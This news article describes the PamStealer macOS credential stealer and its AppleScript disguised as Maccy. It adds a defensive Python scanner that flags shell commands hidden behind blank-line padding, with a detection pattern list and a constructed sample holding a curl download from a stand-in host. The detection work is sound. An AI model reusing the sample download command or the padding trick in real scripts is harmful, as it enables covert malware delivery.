New macOS Malware, PamStealer, Evades Detection with Clever Techniques
Researchers discover a new piece of macOS malware, PamStealer, with stealthy, custom-developed credential-stealing code.

Researchers have discovered a never-before-seen piece of macOS malware that combines several pieces of clever tradecraft to infect Macs with stealthy, custom-developed credential-stealing code. The malware is delivered in two stages. The first stage is distributed in a disk image that masquerades as Maccy, a clipboard manager for Macs.
It is a compiled AppleScript, notable for the way it delivers the second stage. The malware is named PamStealer because the Rust-written infostealer uses the Pluggable Authentication Modules (PAM) interface built into macOS to validate the target's login password before sending it to an attacker-controlled server. Disk images and AppleScript are each common in malware for Macs.
More unusual is the way PamStealer combines them to gain stealth. When the AppleScript is double-clicked, it opens in the macOS Script Editor, where the malicious functionality is buried deep within the file. The malware's creators have implemented a sophisticated evasion technique that makes it challenging for security software to detect. This approach allows PamStealer to operate undetected, posing a significant threat to macOS users.

Why this matters: The discovery of PamStealer highlights the evolving threat landscape for macOS users, who are often perceived as less exposed than Windows users. This malware's ability to evade detection using clever tradecraft underscores the need for developers to prioritize robust security measures, such as implementing strict validation and verification processes for user input.
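The article's point that the malicious functionality is "buried deep within the file" suggests a simple triage heuristic for defenders: flag AppleScript sources whose shell-executing statements sit behind an unusually long run of blank lines, the kind of padding that keeps the payload out of the first screen of Script Editor. The scanner below is an added example written for this page, not code from the researchers or from any detection product; the pattern list, the 200-line padding threshold and the two sample scripts are constructed assumptions rather than indicators from the actual PamStealer sample. The only external tool it references is Apple's `osadecompile`, which turns a compiled `.scpt` back into readable source on macOS.

```python
"""Heuristic triage for AppleScript sources that hide a payload behind padding.

Added example (not from the original article). Assumptions, all constructed:
the SUSPICIOUS_PATTERNS list, the default padding threshold, and both samples.
"""
from __future__ import annotations

import re
import subprocess
from dataclasses import dataclass

# Statements worth a second look when they are pushed far down a script.
# Constructed list for this example; tune it for your own environment.
SUSPICIOUS_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (r"\bdo shell script\b", r"\bcurl\b", r"\bosascript\b", r"\bxattr\b")
]


@dataclass
class Finding:
    line_no: int          # 1-based line on which the statement appears
    padding_before: int   # blank lines immediately preceding it
    snippet: str          # first 80 characters of the statement


def scan_applescript(text: str, min_padding: int = 200) -> list[Finding]:
    """Return suspicious statements that sit behind >= min_padding blank lines."""
    findings: list[Finding] = []
    blank_run = 0
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            blank_run += 1          # extend the current run of padding
            continue
        if blank_run >= min_padding and any(p.search(line) for p in SUSPICIOUS_PATTERNS):
            findings.append(Finding(line_no, blank_run, line.strip()[:80]))
        blank_run = 0               # any non-blank line ends the run
    return findings


def padding_ratio(text: str) -> float:
    """Fraction of lines that are blank; near 1.0 is itself a red flag."""
    lines = text.splitlines()
    if not lines:
        return 0.0
    return sum(1 for ln in lines if not ln.strip()) / len(lines)


def decompile_scpt(path: str) -> str:
    """Compiled .scpt -> source text via Apple's osadecompile (macOS only)."""
    result = subprocess.run(
        ["osadecompile", path], check=True, capture_output=True, text=True
    )
    return result.stdout


# Constructed sample inputs (not real malware artifacts).
BENIGN_SAMPLE = (
    "-- Constructed sample: harmless clipboard helper\n"
    "set theText to the clipboard\n"
    "display dialog theText\n"
)
PADDED_SAMPLE = (
    "-- Constructed sample: a decoy line, 3000 blank lines, then the payload\n"
    'display dialog "Maccy needs to update."\n'
    + "\n" * 3000
    + 'do shell script "curl -fsSL https://stage2.example.invalid/ -o /tmp/s"\n'
)


if __name__ == "__main__":
    import sys

    # Usage: python scan.py payload.applescript   (or a .scpt on macOS)
    if len(sys.argv) == 2:
        src = sys.argv[1]
        text = decompile_scpt(src) if src.endswith(".scpt") else open(src).read()
    else:
        text = PADDED_SAMPLE
    print(f"blank-line ratio: {padding_ratio(text):.3f}")
    for f in scan_applescript(text):
        print(f"line {f.line_no}: {f.padding_before} blank lines before -> {f.snippet}")
```

The benign sample produces no findings, while the padded one reports a single `do shell script` hit at line 3003 behind 3000 blank lines and a blank-line ratio above 0.99. This is a triage signal, not a verdict: legitimate scripts can contain `do shell script`, so the padding condition is what separates the two, and the threshold should be calibrated against scripts actually used in your fleet. Since the first stage arrives in a disk image posing as Maccy, the complementary check is to inspect the signature of any app pulled from such an image with `codesign -dv --verbose=4 <App.app>` and `spctl --assess --type execute <App.app>` before launching it.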
For businesses, this means investing in advanced threat detection systems and providing regular security training for employees. For consumers, it is essential to exercise caution when downloading software, even from seemingly legitimate sources, and to keep the operating system and security software up to date. As malware authors continue to develop more sophisticated threats, the cat-and-mouse game between security researchers and attackers will only intensify, raising questions about the long-term effectiveness of current security measures and the need for innovative solutions to stay ahead of emerging threats.
Source: Ars Technica